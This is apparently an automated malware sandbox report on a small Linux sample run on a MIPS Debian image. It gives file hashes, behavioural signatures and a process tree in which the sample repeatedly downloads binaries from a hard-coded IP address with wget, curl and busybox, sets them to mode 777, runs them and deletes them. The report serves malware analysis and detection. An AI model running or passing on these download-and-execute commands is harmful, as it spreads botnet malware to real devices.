Analysis
-
max time kernel
114s -
max time network
119s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
24/11/2024, 01:31
Static task
static1
Behavioral task
behavioral1
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
Resource
debian9-mipsel-20240611-en
General
-
Target
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N
-
Size
10KB
-
MD5
a7136f5f7aad005f449adf4d9eb6e330
-
SHA1
b6cddbe652904c25cc2e6c5f3063fb13a4df6737
-
SHA256
a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5
-
SHA512
246aa712ed98a0566dc01bd9c38641f09934c708bff0e9535d33a324e832016dc28f55477382fd2c5611a9b79d4b4430ff37fb83814b6fcbb5db8b06708b657e
-
SSDEEP
192:8OyzO6my8zK4ZbHrTssv9my8zK4uHrTssiAl:CzOZzL
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N/tmp/a83da0cf5f9f9e8f40c7551bd4aeb9e2014d1ad92004082a16d106cd38a640b5N1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:733
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:737
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:738
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:740
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:746
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:772
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:783
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:784
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:802
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:806
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:807
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:809
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:812
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:813
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:818
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:829
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:831
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:850
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:857
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:858
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:860
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:863
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:864
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:866
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:869
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:870
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:872
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:875
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:876
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:878
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:881
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:882
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:884
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:887
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:888
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:890
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:893
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:894
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:896
-
-
/bin/chmodchmod 777 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS./1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 1UUkxof3GqI3wNTRgH4H48fxhHtEe8pKrS2⤵PID:899
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:900
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:902
-
-
/bin/chmodchmod 777 I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t./I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm I48bwc6r6ki7VwiKVM8jomK2TOdPY8Nv6t2⤵PID:905
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:906
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:908
-
-
/bin/chmodchmod 777 IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv./IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm IzufB9OFA2jH2E3bYWZs5rj48BdJz5R8lv2⤵PID:911
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:912
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:914
-
-
/bin/chmodchmod 777 qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA./qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm qYe4YgF9mkarZg4u3go8rPtj72iaQQBsfA2⤵PID:917
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:918
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:920
-
-
/bin/chmodchmod 777 Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS./Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm Jpz5SSNw80EX8C7bbSSIVzJjtIgE823ovS2⤵PID:923
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:924
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:926
-
-
/bin/chmodchmod 777 DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM8./DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm DxvHsoPCvsxHC4OroffrQEz01NE0VZ0mM82⤵PID:929
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:930
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:932
-
-
/bin/chmodchmod 777 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF./9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 9hXBhQ2qdCFdgkJ43WqodGDr2spLKsMrkF2⤵PID:935
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:936
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:938
-
-
/bin/chmodchmod 777 kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl./kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm kWeUPCVWzEG668OO4wE0Xnu2iJpq9lSENl2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:944
-
-
/bin/chmodchmod 777 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs./42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 42Bl52aa6XmQbBhBzSA1OdNr54J0Cjc7qs2⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:950
-
-
/bin/chmodchmod 777 duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ./duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm duwXFAXWCeTO4a278SnHwENlBTnb3A1JMQ2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:956
-
-
/bin/chmodchmod 777 u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq./u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm u2Z5IlwnVLrLPeywV2LtjPXRCEHIOtLdTq2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:962
-
-
/bin/chmodchmod 777 MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL./MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm MfOQWEJJGW59km5B1XaHopRkcm1sUYDLJL2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:968
-
-
/bin/chmodchmod 777 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/9kwPr9G14A3vuswrzArUFY6A7t5mjzTR27./9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 9kwPr9G14A3vuswrzArUFY6A7t5mjzTR272⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:974
-
-
/bin/chmodchmod 777 znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA./znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm znuvBZSWmEaFYZKwd3K9gxnIlX6QdCrwZA2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97